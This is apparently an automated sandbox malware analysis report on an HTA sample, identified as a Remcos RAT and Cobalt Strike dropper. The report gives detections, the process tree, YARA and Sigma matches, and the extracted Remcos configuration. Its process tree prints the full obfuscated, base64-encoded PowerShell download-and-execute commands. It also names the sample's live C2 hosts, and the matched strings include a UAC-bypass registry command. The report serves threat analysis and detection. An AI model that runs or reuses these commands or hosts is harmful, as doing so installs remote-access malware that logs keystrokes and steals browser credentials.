Edit tour

Windows Analysis Report
nicegirlforyou.hta

Overview

General Information

Sample name:	nicegirlforyou.hta
Analysis ID:	1572998
MD5:	fea592b533e97736debe379b886595a7
SHA1:	70eb330d0db30762edc64d262b7f1cfc24c8b540
SHA256:	fbda5655a80445279f376d372348b57ab9dbadae81e69df823a6949a412cbe96
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Cobalt Strike Beacon

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected Powershell decode and execute

Yara detected Powershell download and execute

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Yara detected obfuscated html page

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious execution chain found

Suspicious powershell command line found

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 3512 cmdline: mshta.exe "C:\Users\user\Desktop\nicegirlforyou.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 1436 cmdline: "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4824 cmdline: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 5092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 6784 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFAE8.tmp" "c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 1776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 2704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

CasPol.exe (PID: 6860 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["rmcnewprojectadd.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QEQMVZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
nicegirlforyou.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x138728:$a1: Remcos restarted by watchdog! 0x138ca0:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 2704	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2704	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: powershell.exe PID: 2704	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 2704	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 2704	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x9ff94b:$a1: Remcos restarted by watchdog! 0x9ffea8:$a3: %02i:%02i:%02i:%03i 0xa00260:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 2704	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1c4bb:$b2: ::FromBase64String( 0x254ab:$b2: ::FromBase64String( 0x31fd1:$b2: ::FromBase64String( 0x507ac:$b2: ::FromBase64String( 0x5151a:$b2: ::FromBase64String( 0x51583:$b2: ::FromBase64String( 0x54e51:$b2: ::FromBase64String( 0x58d65:$b2: ::FromBase64String( 0x593bf:$b2: ::FromBase64String( 0x5bb23:$b2: ::FromBase64String( 0x5c9b3:$b2: ::FromBase64String( 0x5e10a:$b2: ::FromBase64String( 0x5e764:$b2: ::FromBase64String( 0x61409:$b2: ::FromBase64String( 0x168b73:$b2: ::FromBase64String( 0x1a7408:$b2: ::FromBase64String( 0x3b9031:$b2: ::FromBase64String( 0x3b968b:$b2: ::FromBase64String( 0x3d8351:$b2: ::FromBase64String( 0x3d89ab:$b2: ::FromBase64String( 0x97d49f:$b2: ::FromBase64String(
Process Memory Space: CasPol.exe PID: 6860	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: CasPol.exe PID: 6860	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: CasPol.exe PID: 6860	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: CasPol.exe PID: 6860	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x8f19:$a1: Remcos restarted by watchdog! 0x9476:$a3: %02i:%02i:%02i:%03i 0x982e:$a3: %02i:%02i:%02i:%03i
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
11.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.CasPol.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
11.2.CasPol.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
11.2.CasPol.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
11.2.CasPol.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
11.2.CasPol.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.CasPol.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.CasPol.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
11.2.CasPol.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
11.2.CasPol.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
Click to see the 7 entries

Other

Source	Rule	Description	Author	Strings
amsi32_2704.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_2704.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9y